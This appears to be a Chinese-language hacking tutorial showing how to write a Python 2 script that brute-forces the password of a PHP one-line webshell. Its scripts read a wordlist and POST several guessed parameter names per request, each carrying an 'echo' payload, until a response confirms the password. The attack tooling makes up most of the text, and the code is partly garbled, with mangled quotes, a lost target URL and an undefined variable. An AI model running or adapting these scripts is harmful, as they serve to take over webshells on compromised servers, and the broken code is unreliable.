00×1：

需要用到的模块如下：

import requests

00×2：

首先我们了解一下一句话木马，一般post传递参

一个简单的php一句话木马

先测试一下连接

OK，没问题，我们用浏览器打开传参看一下

由此可以看到密码为x，变量提交能匹配上即执行 echo 语句

这时我猜大家都有了思路，构造post请求即可

00×3：

这里我们可以利用网址特性提交多个参数

这样可以提高爆破效率

分析完成，下面我们开始进行写脚本

00×4：

简单爆破 shell 密码，shell为字典

#!/usr/bin/ python

#-*- coding:utf-8 -*-

import requests

def req(url,s):

global html

data = {s:’echo xc666;’}

req = requests.post(url,data=data)

html = req.content

shell = [‘z’,’y’,’x’]

for s in shell:

req(‘#39;,s)

if ‘xc666’ in html:

print “[+]Find password”,s

break

00×5：

下面我们按我们刚才说的，一次多个参数，增加效率

首先整理一下字典

shell = []

f = open (‘shell.txt’,’r’)

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u”shell密码个数为：”,len(shell)

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

print b

我们一次性提交两个参数测试一下

data = {s:’echo %s;’%s,ss:’echo %s;’%ss}

shell = []

def shelllist():

f = open(‘shell.txt’,’r’)

for x in f.readlines(): #去除换行等字符

x = x.strip()

shell.append(x)

print u”shell密码个数为：”,len(shell)

def main():

shelllist()

for i in range(0,len(shell),2): #分割列表

b=shell[i:i+2]

req(‘#39;,b[0],b[1])

if b[0] in html:

print “[+]Find password”,b[0]

break

elif b[1] in html:

print “[+]Find password”, b[1]

break

main()

测试一下，一次执行两个密码

00×6：

https:// github .com/hackxc/Pyhacker/

github项目地址

一次爆破5次密码，可自行调整